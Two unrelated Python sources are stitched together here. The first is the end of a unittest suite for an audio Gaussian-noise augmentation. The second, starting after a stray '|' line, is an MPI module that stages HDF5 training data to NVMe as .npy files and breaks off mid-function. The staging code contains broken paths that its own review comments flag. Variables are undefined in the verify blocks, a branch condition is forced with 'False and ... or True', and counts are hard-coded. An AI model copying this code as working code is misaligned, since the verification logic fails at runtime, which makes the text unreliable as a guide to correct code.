            samples_out = augmenter(samples=samples_in, sample_rate=16000)
        std_out = np.mean(np.abs(samples_out))
        self.assertEqual(samples_out.dtype, np.float32)
        self.assertNotAlmostEqual(float(std_out), 0.0)
        self.assertGreater(std_out, std_in)

    def test_gaussian_noise_snr_legacy_keyword_parameter(self):
        # Legacy keyword arguments still work but warn.
        np.random.seed(42)
        samples_in = np.random.normal(0, 1, size=1024).astype(np.float32)
        augmenter = AddGaussianSNR(min_SNR=0.001, max_SNR=1.0, p=1.0)
        std_in = np.mean(np.abs(samples_in))
        with self.assertWarns(UserWarning):
            samples_out = augmenter(samples=samples_in, sample_rate=16000)
        std_out = np.mean(np.abs(samples_out))
        self.assertEqual(samples_out.dtype, np.float32)
        self.assertNotAlmostEqual(float(std_out), 0.0)
        self.assertGreater(std_out, std_in)

    def test_gaussian_noise_snr_specify_both_new_and_legacy_params(self):
        # Trying to specify both legacy and new parameters. This should raise an exception.
        with self.assertRaises(Exception):
            augmenter = AddGaussianSNR(
                min_SNR=0.001, max_SNR=1.0, min_snr_in_db=15, max_snr_in_db=35, p=1.0
            )

    def test_gaussian_noise_snr(self):
        # New dB-based parameters: no deprecation warning expected.
        np.random.seed(42)
        samples_in = np.random.normal(0, 1, size=1024).astype(np.float32)
        augmenter = AddGaussianSNR(min_snr_in_db=15, max_snr_in_db=35, p=1.0)
        std_in = np.mean(np.abs(samples_in))
        samples_out = augmenter(samples=samples_in, sample_rate=16000)
        std_out = np.mean(np.abs(samples_out))
        self.assertEqual(samples_out.dtype, np.float32)
        self.assertNotAlmostEqual(float(std_out), 0.0)
        self.assertGreater(std_out, std_in)

    def test_serialize_parameters(self):
        # Randomized parameters must round-trip through json.dumps.
        np.random.seed(42)
        transform = AddGaussianSNR(min_snr_in_db=15, max_snr_in_db=35, p=1.0)
        samples = np.random.normal(0, 1, size=1024).astype(np.float32)
        transform.randomize_parameters(samples, sample_rate=16000)
        json.dumps(transform.serialize_parameters())

    def test_gaussian_noise_snr_multichannel(self):
        # Multichannel (channels, samples) input keeps dtype and gains energy.
        np.random.seed(42)
        samples = np.random.normal(0, 0.1, size=(3, 8888)).astype(np.float32)
        augmenter = AddGaussianSNR(min_snr_in_db=15, max_snr_in_db=35, p=1.0)
        samples_out = augmenter(samples=samples, sample_rate=16000)
        self.assertEqual(samples_out.dtype, np.float32)
        self.assertGreater(
            float(np.sum(np.abs(samples_out))), float(np.sum(np.abs(samples)))
        )

    def test_convert_old_parameters_to_new_parameters(self):
        # A legacy SNR ratio r corresponds to -20*log10(r) dB; with identical
        # RNG seeds, legacy- and new-style augmenters should produce output
        # with (nearly) identical RMS.
        np.random.seed(42)
        samples_in = np.random.normal(0, 1, size=1024).astype(np.float32)
        min_SNR = 0.5
        max_SNR = 0.5
        min_snr_in_db = -20 * math.log10(min_SNR)
        max_snr_in_db = -20 * math.log10(max_SNR)
        self.assertAlmostEqual(min_snr_in_db, 6.0205999)
        self.assertAlmostEqual(max_snr_in_db, 6.0205999)
        legacy_augmenter = AddGaussianSNR(min_SNR=min_SNR, max_SNR=max_SNR, p=1.0)
        new_augmenter = AddGaussianSNR(
            min_snr_in_db=min_snr_in_db, max_snr_in_db=max_snr_in_db, p=1.0
        )
        # Reseed so both augmenters draw the same random numbers.
        np.random.seed(42)
        random.seed(42)
        with self.assertWarns(UserWarning):
            samples_out_legacy = legacy_augmenter(samples=samples_in, sample_rate=16000)
        np.random.seed(42)
        random.seed(42)
        samples_out_new = new_augmenter(samples=samples_in, sample_rate=16000)
        legacy_rms = calculate_rms(samples_out_legacy)
        new_rms = calculate_rms(samples_out_new)
        self.assertAlmostEqual(legacy_rms, new_rms, places=3)
|
import os
from glob import glob
import itertools
import numpy as np
import time
from queue import LifoQueue as Queue
import torch.cuda.nvtx as nvtx
import copy
import h5py
import subprocess
def get_shard_range(num_files, num_shards, shard_id, cycle_dist=0):
    """Return the half-open (start, end) file-index range of one shard.

    Files are split as evenly as possible: the first num_files % num_shards
    shards receive one extra file each, so every file is covered exactly
    once. cycle_dist is accepted for interface compatibility but unused.
    """
    assert (shard_id < num_shards)
    base = num_files // num_shards
    extras = num_files % num_shards
    # boundaries[i] is the first file index owned by shard i
    boundaries = [0]
    for prev_shard in range(num_shards - 1):
        boundaries.append(boundaries[-1] + base + (1 if prev_shard < extras else 0))
    boundaries.append(num_files)
    return boundaries[shard_id], boundaries[shard_id + 1]
# this routine stages data for each instance
def stage_instance_data(
    stage_comm, instance_comm, instance_node_comm,
    lsize, lrank,
    hdf5file, dataset, target_directory,
    batch_size=-1,
    stage_num_workers=1,
    stage_mode="node",
    full_dataset_per_node=True,
    use_direct_io=False,
    prepare_staging=False, load_hdf5=False, touch=False
):
    """Stage this instance-rank's shard of an HDF5 dataset as .npy files.

    Each rank of *instance_comm* copies its slice (see get_shard_range) of
    *dataset* in *hdf5file* into one .npy file per sample under
    *target_directory*; with touch=True only empty files are created.

    Several parameters (stage_comm, instance_node_comm, batch_size,
    stage_num_workers, stage_mode, full_dataset_per_node, use_direct_io,
    prepare_staging, load_hdf5) are accepted for interface compatibility
    but are unused here.

    Returns:
        (0, 0) — read/write byte counters are not tracked in this variant.
    """
    isize = instance_comm.Get_size()
    irank = instance_comm.Get_rank()
    # label files use the "label" prefix, everything else the dataset name
    prefix = "label" if dataset == "labels" else dataset
    chunk_size = 16
    files_local = []
    # context manager closes the HDF5 handle (it was previously leaked)
    with h5py.File(hdf5file, "r") as f:
        ds = f.get(dataset)
        num_files = ds.shape[0]
        shard_start, shard_end = get_shard_range(num_files, isize, irank, cycle_dist=lsize)
        for chunk_start in range(shard_start, shard_end, chunk_size):
            chunk_end = min(shard_end, chunk_start + chunk_size)
            # read a whole chunk at once to amortize HDF5 access cost
            data = ds[chunk_start:chunk_end]
            for i in range(data.shape[0]):
                outputfile = "{}-{:06}.npy".format(prefix, chunk_start + i)
                outpath = os.path.join(target_directory, outputfile)
                if touch:
                    subprocess.run(['touch', outpath])
                else:
                    np.save(outpath, data[i])
                files_local.append(outputfile)
    return 0, 0
def stage_data_helper(
    global_comm, num_instances, instance_id, instance_comm,
    local_size, local_rank, pargs, verify=False,
    full_dataset_per_node=True, use_direct_io=False,
    seed=333,
    prepare_staging=False, touch=False
):
    """Stage the train/validation data for one instance into its staging
    directory, sharded over the instance's ranks via stage_instance_data.

    Returns a hard-coded (num_train, num_val) = (121266, 15158).

    NOTE(review): pargs.data_format is force-overwritten to
    "dali-numpy/hdf5" below, so only the HDF5 branch is ever taken.
    NOTE(review): in the HDF5 branch `allfiles` is never assigned, so
    verify=True would raise NameError in the verification block — confirm
    before enabling verify.
    """
    # - Every instance needs all the data, so we need inum replicas.
    # - Every rank irank within an instance can stage data_size / isize of the total data
    # - Since there are num_instances ranks working on the same data, we could shard this among
    #   those ranks too
    gsize = global_comm.Get_size()
    grank = global_comm.Get_rank()
    isize = instance_comm.Get_size()
    irank = instance_comm.Get_rank()
    lsize = local_size
    lrank = local_rank
    load_hdf5 = False
    # create staging filter:
    pargs.data_format = "dali-numpy/hdf5" # TODO Fix
    # NOTE(review): "False and" makes the first branch unreachable except
    # for the 'dali-es' case; combined with "or True" below, the HDF5
    # branch is effectively always chosen.
    if False and (pargs.data_format == "dali-numpy") or (pargs.data_format == 'dali-es'):
        stage_filter_list = ['validation/data-*.npy', 'validation/label-*.npy',
                             'train/data-*.npy', 'train/label-*.npy']
        # print("not hdf5", pargs.data_format)
    elif pargs.data_format == "dali-numpy/hdf5" or True:
        stage_filter_list = ["train.h5/data", "train.h5/labels", "validation.h5/data",
                             "validation.h5/labels"]
        load_hdf5 = True
        # print("hdf5!!")
    elif pargs.data_format == "dali-dummy":
        return
    else:
        raise NotImplementedError(
            f"Error, data-format {pargs.data_format} not implemented for staging"
        )
    # create subdirectory for each instance, just in case if multiple instances see the same directory
    stage_dir = os.path.join(pargs.stage_dir_prefix, f"instance{instance_id}")
    if lrank == 0:
        os.makedirs(stage_dir, exist_ok=True)
    # create the train and validation folders
    if lrank == 0:
        os.makedirs(os.path.join(stage_dir, "train"), exist_ok=True)
        os.makedirs(os.path.join(stage_dir, "validation"), exist_ok=True)
    # split the global communicator according to irank: key could be instance_id but we would end up
    stage_comm = global_comm.Split(color=irank, key=instance_id)
    # split the instance by nodes and create a comm with all matching local ranks by node
    instance_node_id = irank // lsize
    instance_node_comm = instance_comm.Split(color=lrank, key=instance_node_id)
    # iterate over staging filters
    file_stats = {}
    for stage_filter in stage_filter_list:
        nvtx.range_push(f"stage {stage_filter}")
        if not prepare_staging and (grank == 0):
            print(f"Staging {stage_filter}", flush=True)
        elif irank == 0:
            print(f"Preparing file lists for {stage_dir} {stage_filter}", flush=True)
        # get directories
        if not load_hdf5:
            stage_source_directory = os.path.join(
                pargs.data_dir_prefix, os.path.dirname(stage_filter)
            )
        else:
            # split "name.h5/dataset" into the file name and dataset key
            tmp = stage_filter.split("/")
            fname, dataset = tmp[0], tmp[1]
            hdf5_file = os.path.join(pargs.data_dir_prefix, fname)
        stage_target_directory = os.path.join(stage_dir, stage_filter.split(".")[0])
        # create target directory if not exist:
        if local_rank == 0:
            os.makedirs(stage_target_directory, exist_ok=True)
        if not load_hdf5:
            # get file info to everybody
            if grank == 0 and not load_hdf5:
                allfiles = sorted(
                    glob(os.path.join(stage_source_directory, os.path.basename(stage_filter)))
                )
            else:
                allfiles = None
            # shuffle files if requested
            if (grank == 0) and (not full_dataset_per_node) and (seed is not None):
                rng = np.random.default_rng(seed)
                rng.shuffle(allfiles)
            # communicate list of files
            allfiles = global_comm.bcast(allfiles, 0)
        # now stage the data so that each rank in each instance has the relevant data
        stage_start = time.perf_counter()
        total_read, total_write = stage_instance_data(
            stage_comm, instance_comm, instance_node_comm,
            lsize, lrank,
            hdf5_file, dataset, stage_target_directory,
            pargs.stage_batch_size,
            pargs.stage_num_workers,
            pargs.stage_mode,
            full_dataset_per_node,
            use_direct_io,
            prepare_staging, load_hdf5=load_hdf5,
            touch=touch
        )
        stage_stop = time.perf_counter()
        # updating file stats buffer
        file_stats[stage_filter] = 0 # len(allfiles)
        # skip the rest if we want to prep staging only
        if prepare_staging:
            continue
        # unit conversion
        unit_convert_gb = 1. / float(1024 * 1024 * 1024)
        # allreduce:
        total_read = global_comm.allreduce(total_read)
        total_write = global_comm.allreduce(total_write)
        # convert units
        total_read *= unit_convert_gb
        total_write *= unit_convert_gb
        # stage duration:
        stage_duration = stage_stop - stage_start
        # print
        if grank == 0:
            print(
                f"""Staging {stage_filter} done.
                      Total number of files: {file_stats[stage_filter]}.
                      Elapsed time {stage_duration:.2f}s.
                      Read {total_read:.2f} GB (bandwidth: {total_read / stage_duration:.2f} GB/s).
                      Write {total_write:.2f} GB (bandwidth: {total_write / stage_duration:.2f} GB/s).
                      """
            )
        # verify staging results if requested
        if verify:
            nvtx.range_push(f"stage_verify")
            if local_rank == 0:
                files = glob(os.path.join(stage_target_directory, os.path.basename(stage_filter)))
            else:
                files = []
            if not full_dataset_per_node:
                # if every node hosts a shard, we need to sum the results, if not we need to make sure everybody has the same
                files_full = instance_comm.allgather(files)
                files_full = set(itertools.chain(*files_full))
            else:
                files_full = set(files)
            num_files = len(files_full)
            # strip off the directory
            checkfiles1 = sorted([os.path.basename(x) for x in files_full])
            # NOTE(review): `allfiles` is only assigned in the non-HDF5
            # branch above; in the HDF5 path this raises NameError.
            checkfiles2 = sorted([os.path.basename(x) for x in allfiles])
            assert (num_files == file_stats[stage_filter])
            assert (checkfiles1 == checkfiles2)
            if irank == 0:
                print(
                    f"Staged data for {stage_filter}: {num_files}, expected: {file_stats[stage_filter]}",
                    flush=True
                )
            nvtx.range_pop()
        # close range
        nvtx.range_pop()
    return 121266, 15158
def touch_files_in_stage_dir(
    global_comm, instance_comm, instance_id, local_size, local_rank, pargs
):
    """Touch this instance-rank's shard of the already-staged train/val files.

    Resolves the stage directory according to pargs.data_staging_method
    ("instance", "nodes" or "full"), shards the hard-coded train/validation
    file counts over the instance ranks, and touches each file in the shard.

    Raises:
        ValueError: for an unknown pargs.data_staging_method.
    """
    isize = instance_comm.Get_size()
    irank = instance_comm.Get_rank()
    lrank = local_rank
    # create subdirectory for each instance, just in case if multiple instances see the same directory
    if pargs.data_staging_method == "instance":
        stage_dir = os.path.join(pargs.stage_dir_prefix, f"instance{instance_id}")
    elif pargs.data_staging_method == "nodes":
        stage_dir = os.path.join(pargs.stage_dir_prefix, f"instance{instance_id}")
        # assumes 4 ranks per node — TODO confirm against launch config
        node_num = global_comm.Get_rank() // 4
        stage_dir = os.path.join(stage_dir, str(node_num))
    elif pargs.data_staging_method == "full":
        stage_dir = pargs.stage_dir_prefix
    else:
        raise ValueError(f"invalid data staging method: {pargs.data_staging_method}")
    if lrank == 0:
        os.makedirs(stage_dir, exist_ok=True)
    # create the train and validation folders
    train_dir = os.path.join(stage_dir, "train")
    val_dir = os.path.join(stage_dir, "validation")
    if lrank == 0:
        os.makedirs(train_dir, exist_ok=True)
        os.makedirs(val_dir, exist_ok=True)
    data_filter = '*data-*.npy'
    label_filter = '*label-*.npy'
    # bug fix: the module does `from glob import glob`, so the previous
    # `glob.glob(...)` raised AttributeError; call glob() directly.
    train_data_files = sorted(glob(os.path.join(train_dir, data_filter)))
    train_label_files = sorted(glob(os.path.join(train_dir, label_filter)))
    # bug fix: validation file lists previously globbed train_dir
    val_data_files = sorted(glob(os.path.join(val_dir, data_filter)))
    val_label_files = sorted(glob(os.path.join(val_dir, label_filter)))
    # NOTE: THIS CREATES FILES FOR EACH INSTANCE!!
    num_train, num_val = 121266, 15158
    train_shard_sz = num_train // isize
    train_shards = [train_shard_sz * i for i in range(isize)] + [num_train, ]
    val_shard_sz = num_val // isize
    val_shards = [val_shard_sz * i for i in range(isize)] + [num_val, ]
    train_slice = slice(train_shards[irank], train_shards[irank + 1])
    val_slice = slice(val_shards[irank], val_shards[irank + 1])

    def _touch_all(paths, directory):
        # touch each file into *directory*, keeping only the basename
        for path in paths:
            target = os.path.join(directory, os.path.basename(path))
            subprocess.run(['touch', str(target)])

    _touch_all(train_data_files[train_slice], train_dir)
    _touch_all(train_label_files[train_slice], train_dir)
    _touch_all(val_data_files[val_slice], val_dir)
    _touch_all(val_label_files[val_slice], val_dir)
def stage_to_NVMe_node_folders_h5(
    global_comm, num_instances, instance_id, instance_comm,
    local_size, local_rank, pargs, verify=False,
    full_dataset_per_node=True, use_direct_io=False,
    seed=333, prepare_staging=False,
    number_workers=6, touch=False
):
    """Stage HDF5 train/validation data into per-node NVMe folders
    (<stage_dir_prefix>/instance<N>/<node>/...), sharded over the instance
    ranks via stage_instance_data_nvme.

    Returns hard-coded (num_train, num_val) = (121266, 15158).

    NOTE(review): `allfiles` is never assigned in this function, so
    verify=True raises NameError in the verification block — confirm
    before enabling verify.
    NOTE(review): node number is derived as grank // 4, i.e. assumes 4
    ranks per node — confirm against the launch configuration.
    """
    # NOTE: this will use the global comm exclusivly
    # only stage the shard of the data which will go on that node
    # TODO: tell DALI that this data is already staged (use dali-numpy?)
    # each instance gets a full dataset, so we need inum replicas.
    # REMINDER: data is already shuffled in the file
    # 0. create folder for each node in the NVMe dir -> instance_num/instance_node/(train/val)
    # 1. get full length
    # 2. get number of items per rank in instance
    # - Every rank irank within an instance can stage data_size / isize of the total data
    # - Since there are num_instances ranks working on the same data, we could shard this among
    #   those ranks too
    gsize = global_comm.Get_size()
    grank = global_comm.Get_rank()
    isize = instance_comm.Get_size()
    irank = instance_comm.Get_rank()
    lsize = local_size  # get the number of GPUs on each node
    lrank = local_rank  # get the node-local rank
    # create staging filter:
    if pargs.data_format.endswith("hdf5"):
        stage_filter_list = ["train.h5/data", "train.h5/labels", "validation.h5/data",
                             "validation.h5/labels"]
        # print("hdf5!!")
    elif pargs.data_format == "dali-dummy":
        return
    else:
        raise NotImplementedError(
            f"Error, data-format {pargs.data_format} not implemented for h5 staging"
        )
    stage_dir = os.path.join(pargs.stage_dir_prefix, f"instance{instance_id}")
    node_num = grank // 4
    stage_dir = os.path.join(stage_dir, str(node_num))
    os.makedirs(stage_dir, exist_ok=True)
    os.makedirs(os.path.join(stage_dir, "train"), exist_ok=True)
    os.makedirs(os.path.join(stage_dir, "validation"), exist_ok=True)
    # print(f"stage dir {stage_dir}")
    # stage_dir -> /NVMe_folder/instance_num/node_number/
    stage_comm = global_comm.Split(color=irank, key=instance_id)
    # iterate over staging filters
    file_stats = {}
    for stage_filter in stage_filter_list:
        nvtx.range_push(f"stage {stage_filter}")
        # if not prepare_staging and (grank == 0):
        #     print(f"Staging {stage_filter}", flush=True)
        # elif grank == 0:  # this should run for the single h5
        #     print(f"Preparing file lists for {stage_filter}", flush=True)
        # get directories
        tmp = stage_filter.split("/")  # split off the data/lable at the end of the stage_filer
        fname, dataset = tmp[0], tmp[1]  # h5 file, (data/label)
        hdf5_file = os.path.join(pargs.data_dir_prefix, fname)
        stage_target_directory = os.path.join(stage_dir, stage_filter.split(".")[0])
        # now stage the data so that each rank in each instance has the relevant data
        stage_start = time.perf_counter()
        # print(f"stage_target_directory: {stage_target_directory}")
        total_read, total_write = stage_instance_data_nvme(
            stage_comm, global_comm, instance_comm, hdf5_file, dataset, stage_target_directory, touch=touch
        )
        stage_stop = time.perf_counter()
        # updating file stats buffer
        file_stats[stage_filter] = 0
        # skip the rest if we want to prep staging only
        if prepare_staging:
            continue
        # unit conversion
        unit_convert_gb = 1. / float(1024 * 1024 * 1024)
        # allreduce:
        total_read = global_comm.allreduce(total_read)
        total_write = global_comm.allreduce(total_write)
        # convert units
        total_read *= unit_convert_gb
        total_write *= unit_convert_gb
        # stage duration:
        stage_duration = stage_stop - stage_start
        # print
        if grank == 0:
            print(
                f"""Staging {stage_filter} done.
                      Total number of files: {file_stats[stage_filter]}.
                      Elapsed time {stage_duration:.2f}s.
                      Read {total_read:.2f} GB (bandwidth: {total_read / stage_duration:.2f} GB/s).
                      Write {total_write:.2f} GB (bandwidth: {total_write / stage_duration:.2f} GB/s).
                      """
            )
        # verify staging results if requested
        if verify:
            nvtx.range_push(f"stage_verify")
            if local_rank == 0:
                files = glob(os.path.join(stage_target_directory, os.path.basename(stage_filter)))
            else:
                files = []
            if not full_dataset_per_node:
                # if every node hosts a shard, we need to sum the results, if not we need to make sure everybody has the same
                files_full = instance_comm.allgather(files)
                files_full = set(itertools.chain(*files_full))
            else:
                files_full = set(files)
            num_files = len(files_full)
            # strip off the directory
            checkfiles1 = sorted([os.path.basename(x) for x in files_full])
            # NOTE(review): `allfiles` is undefined here — NameError when
            # verify=True.
            checkfiles2 = sorted([os.path.basename(x) for x in allfiles])
            assert (num_files == file_stats[stage_filter])
            assert (checkfiles1 == checkfiles2)
            if irank == 0:
                print(
                    f"Staged data for {stage_filter}: {num_files}, expected: {file_stats[stage_filter]}",
                    flush=True
                )
            nvtx.range_pop()
        # close range
        nvtx.range_pop()
    return 121266, 15158
def stage_instance_data_nvme(
    stage_comm, global_comm, instance_comm, hdf5file, dataset, target_directory, touch=False
):
    """Stage this instance-rank's shard of an HDF5 dataset to NVMe as .npy files.

    Shards *dataset* in *hdf5file* over the ranks of *instance_comm* and
    writes one .npy file per sample under *target_directory* (or just
    touches the file names when *touch* is set). stage_comm and global_comm
    are accepted for interface compatibility but unused.

    Returns:
        (0, 0) — read/write byte counters are not tracked here.
    """
    isize = instance_comm.Get_size()
    irank = instance_comm.Get_rank()
    # label files use the "label" prefix, everything else the dataset name
    prefix = "label" if dataset == "labels" else dataset
    chunk_size = 32
    files_local = []
    # context manager closes the HDF5 handle (it was previously leaked)
    with h5py.File(hdf5file, "r") as f:
        ds = f.get(dataset)
        num_files = ds.shape[0]
        # reuse the shared sharding helper instead of duplicating its logic
        shard_start, shard_end = get_shard_range(num_files, isize, irank)
        for chunk_start in range(shard_start, shard_end, chunk_size):
            chunk_end = min(shard_end, chunk_start + chunk_size)
            # read a whole chunk at once to amortize HDF5 access cost
            data = ds[chunk_start:chunk_end]
            for i in range(data.shape[0]):
                outputfile = "{}-{:06}.npy".format(prefix, chunk_start + i)
                outpath = os.path.join(target_directory, outputfile)
                if touch:
                    subprocess.run(['touch', outpath])
                else:
                    np.save(outpath, data[i])
                files_local.append(outputfile)
    return 0, 0
def stage_to_NVMe_all_shared_h5(
    global_comm, num_instances, instance_id, instance_comm,
    local_size, local_rank, pargs, verify=False,
    full_dataset_per_node=True, use_direct_io=False,
    seed=333, prepare_staging=False,
    number_workers=6, touch=False,
):
    """Stage HDF5 train/validation data once into a single NVMe directory
    shared by all ranks, sharded over the global communicator via
    stage_instance_data_nvme_all_shared.

    Returns hard-coded (num_train, num_val) = (121266, 15158).

    NOTE(review): the verification block references `allfiles` and `irank`,
    neither of which is defined in this function — verify=True would raise
    NameError. Confirm before enabling verify.
    """
    # NOTE: this will use the global comm exclusivly
    # only stage the shard of the data which will go on that node
    # each instance gets a full dataset, so we need inum replicas.
    # REMINDER: data is already shuffled in the file
    # 0. create folder for each node in the NVMe dir -> instance_num/instance_node/(train/val)
    # 1. get full length
    # 2. get number of items per rank in instance
    # - Every rank irank within an instance can stage data_size / isize of the total data
    # - Since there are num_instances ranks working on the same data, we could shard this among
    #   those ranks too
    gsize = global_comm.Get_size()
    grank = global_comm.Get_rank()
    lsize = local_size  # get the number of GPUs on each node
    lrank = local_rank  # get the node-local rank
    # print(f"Start staging, gsize {gsize} grank {grank} lsize {lsize} lrank {lrank}")
    if pargs.data_format.endswith("hdf5"):
        stage_filter_list = ["train.h5/data", "train.h5/labels", "validation.h5/data",
                             "validation.h5/labels"]
    elif pargs.data_format == "dali-dummy":
        return
    else:
        raise NotImplementedError(
            f"Error, data-format {pargs.data_format} not implemented for h5 staging"
        )
    stage_dir = pargs.stage_dir_prefix
    if lrank == 0:
        os.makedirs(os.path.join(stage_dir, "train"), exist_ok=True)
        os.makedirs(os.path.join(stage_dir, "validation"), exist_ok=True)
    # print(f"stage dir {stage_dir}")
    # stage_dir -> /NVMe_folder/
    # iterate over staging filters
    file_stats = {}
    for stage_filter in stage_filter_list:
        nvtx.range_push(f"stage {stage_filter}")
        if not prepare_staging and (grank == 0):
            print(f"Staging {stage_filter}", flush=True)
        elif grank == 0:  # this should run for the single h5
            print(f"Preparing file lists for {stage_filter}", flush=True)
        tmp = stage_filter.split("/")  # split off the data/lable at the end of the stage_filer
        fname, dataset = tmp[0], tmp[1]  # h5 file, (data/label)
        hdf5_file = os.path.join(pargs.data_dir_prefix, fname)
        stage_target_directory = os.path.join(stage_dir, stage_filter.split(".")[0])
        # now stage the data so that each rank in each instance has the relevant data
        stage_start = time.perf_counter()
        # print(f"stage_target_directory: {stage_target_directory} touch: {touch}")
        total_read, total_write = stage_instance_data_nvme_all_shared(
            global_comm, hdf5_file, dataset, stage_target_directory, stage_dir, touch=touch
        )
        stage_stop = time.perf_counter()
        # updating file stats buffer
        file_stats[stage_filter] = 0  # len(allfiles)
        # skip the rest if we want to prep staging only
        if prepare_staging:
            continue
        # unit conversion
        unit_convert_gb = 1. / float(1024 * 1024 * 1024)
        # allreduce:
        total_read = global_comm.allreduce(total_read)
        total_write = global_comm.allreduce(total_write)
        # convert units
        total_read *= unit_convert_gb
        total_write *= unit_convert_gb
        # stage duration:
        stage_duration = stage_stop - stage_start
        # print
        if grank == 0:
            print(
                f"""Staging {stage_filter} done.
                      Total number of files: {file_stats[stage_filter]}.
                      Elapsed time {stage_duration:.2f}s.
                      Read {total_read:.2f} GB (bandwidth: {total_read / stage_duration:.2f} GB/s).
                      Write {total_write:.2f} GB (bandwidth: {total_write / stage_duration:.2f} GB/s).
                      """
            )
        # verify staging results if requested
        if verify:
            nvtx.range_push(f"stage_verify")
            if local_rank == 0:
                files = glob(os.path.join(stage_target_directory, os.path.basename(stage_filter)))
            else:
                files = []
            if not full_dataset_per_node:
                # if every node hosts a shard, we need to sum the results, if not we need to make sure everybody has the same
                files_full = instance_comm.allgather(files)
                files_full = set(itertools.chain(*files_full))
            else:
                files_full = set(files)
            num_files = len(files_full)
            # strip off the directory
            checkfiles1 = sorted([os.path.basename(x) for x in files_full])
            # NOTE(review): `allfiles` is undefined here — NameError when
            # verify=True.
            checkfiles2 = sorted([os.path.basename(x) for x in allfiles])
            assert (num_files == file_stats[stage_filter])
            assert (checkfiles1 == checkfiles2)
            # NOTE(review): `irank` is also undefined in this function.
            if irank == 0:
                print(
                    f"Staged data for {stage_filter}: {num_files}, expected: {file_stats[stage_filter]}",
                    flush=True
                )
            nvtx.range_pop()
        # close range
        nvtx.range_pop()
    global_comm.Barrier()
    return 121266, 15158
def stage_instance_data_nvme_all_shared(
    global_comm, hdf5file, dataset, target_directory, stage_dir, touch=False
):
    """Stage this global rank's shard of an HDF5 dataset into the shared
    NVMe directory as per-sample .npy files.

    Shards *dataset* in *hdf5file* over all ranks of *global_comm* and
    writes (or, with touch=True, merely touches) one .npy file per sample
    under *target_directory*. stage_dir is accepted for interface
    compatibility but unused.

    Returns:
        (0, 0) — read/write byte counters are not tracked here.
    """
    gsize = global_comm.Get_size()
    grank = global_comm.Get_rank()
    # label files use the "label" prefix, everything else the dataset name;
    # the previous if/else computed the identical filename in both branches.
    prefix = "label" if dataset == "labels" else dataset
    chunk_size = 16
    # context manager closes the HDF5 handle (it was previously leaked)
    with h5py.File(hdf5file, "r") as f:
        ds = f.get(dataset)
        num_files = ds.shape[0]
        # reuse the shared sharding helper instead of duplicating its logic
        shard_start, shard_end = get_shard_range(num_files, gsize, grank)
        for chunk_start in range(shard_start, shard_end, chunk_size):
            chunk_end = min(shard_end, chunk_start + chunk_size)
            # read a whole chunk at once to amortize HDF5 access cost
            data = ds[chunk_start:chunk_end]
            for i in range(data.shape[0]):
                outpath = os.path.join(
                    target_directory, "{}-{:06}.npy".format(prefix, chunk_start + i))
                if touch:
                    subprocess.run(['touch', outpath])
                else:
                    np.save(outpath, data[i])
    return 0, 0
def stage_to_NVMe_instance_rank_folders_h5(
        global_comm, num_instances, instance_id, instance_comm,
        local_size, local_rank, pargs, verify=False,
        full_dataset_per_node=True, use_direct_io=False,
        seed=333, prepare_staging=False,
        number_workers=6, touch=False
):
    """Stage train/validation HDF5 data to NVMe, one subdirectory per instance rank.

    Creates ``<stage_dir_prefix>/<instance_rank>/{train,validation}`` and calls
    :func:`stage_instance_data_nvme_instance_ranks` for each of
    ``{train,validation}.h5 x {data,labels}``, reporting aggregate read/write
    bandwidth. Returns the hard-coded (train, validation) sample counts
    (121266, 15158) — presumably the CosmoFlow dataset sizes; confirm upstream.
    """
    # NOTE: this will use the global comm exclusivly
    # only stage the shard of the data which will go on that node
    # TODO: tell DALI that this data is already staged (use dali-numpy?)
    # each instance gets a full dataset, so we need inum replicas.
    # REMINDER: data is already shuffled in the file
    # 0. create folder for each node in the NVMe dir -> instance_num/instance_node/(train/val)
    # 1. get full length
    # 2. get number of items per rank in instance
    #    - Every rank irank within an instance can stage data_size / isize of the total data
    #    - Since there are num_instances ranks working on the same data, we could shard this among
    #      those ranks too
    # gsize = global_comm.Get_size()
    grank = global_comm.Get_rank()
    # isize = instance_comm.Get_size()
    irank = instance_comm.Get_rank()
    # lsize = local_size  # get the number of GPUs on each node
    # lrank = local_rank  # get the node-local rank
    # print(f"Start staging, gsize {gsize} grank {grank} isize {isize} irank {irank} lsize {lsize} "
    #       f"lrank {lrank}")
    if pargs.data_format.endswith("hdf5"):
        stage_filter_list = ["train.h5/data", "train.h5/labels", "validation.h5/data",
                             "validation.h5/labels"]
        # print("hdf5!!")
    elif pargs.data_format == "dali-dummy":
        return
    else:
        raise NotImplementedError(
            f"Error, data-format {pargs.data_format} not implemented for h5 staging"
        )
    # create subdirectory for each instance, just in case if multiple instances see the same directory
    # NOTE(review): node_number is computed but never used below — dead code?
    node_number = grank // 4  # 4 gpus per node
    stage_dir = os.path.join(pargs.stage_dir_prefix, str(irank))
    os.makedirs(stage_dir, exist_ok=True)
    # print(f"{grank} {lrank} {node_number} stage dir: {stage_dir}")
    # if lrank == 0:  # should be fine to try to make it from every rank
    os.makedirs(os.path.join(stage_dir, "train"), exist_ok=True)
    os.makedirs(os.path.join(stage_dir, "validation"), exist_ok=True)
    print(f"stage dir {stage_dir}")
    # stage_dir -> /NVMe_folder/instance_rank
    # iterate over staging filters
    file_stats = {}
    for stage_filter in stage_filter_list:
        nvtx.range_push(f"stage {stage_filter}")
        if not prepare_staging and (grank == 0):
            print(f"Staging {stage_filter}", flush=True)
        elif grank == 0:  # this should run for the single h5
            print(f"Preparing file lists for {stage_filter}", flush=True)
        tmp = stage_filter.split("/")  # split off the data/lable at the end of the stage_filer
        fname, dataset = tmp[0], tmp[1]  # h5 file, (data/label)
        hdf5_file = os.path.join(pargs.data_dir_prefix, fname)
        stage_target_directory = os.path.join(stage_dir, stage_filter.split(".")[0])
        # now stage the data so that each rank in each instance has the relevant data
        stage_start = time.perf_counter()
        print(f"stage_target_directory: {stage_target_directory}")
        total_read, total_write = stage_instance_data_nvme_instance_ranks(
            global_comm, instance_comm, hdf5_file, dataset, stage_target_directory, instance_id, touch=touch
        )
        stage_stop = time.perf_counter()
        # updating file stats buffer
        # NOTE(review): the count is hard-coded to 0, so the verify asserts below
        # cannot hold — TODO restore the real file count here.
        file_stats[stage_filter] = 0  # len(allfiles)
        # skip the rest if we want to prep staging only
        if prepare_staging:
            continue
        # unit conversion
        unit_convert_gb = 1. / float(1024 * 1024 * 1024)
        # allreduce:
        total_read = global_comm.allreduce(total_read)
        total_write = global_comm.allreduce(total_write)
        # convert units
        total_read *= unit_convert_gb
        total_write *= unit_convert_gb
        # stage duration:
        stage_duration = stage_stop - stage_start
        # print
        if grank == 0:
            print(
                f"""Staging {stage_filter} done.
                      Total number of files: {file_stats[stage_filter]}.
                      Elapsed time {stage_duration:.2f}s.
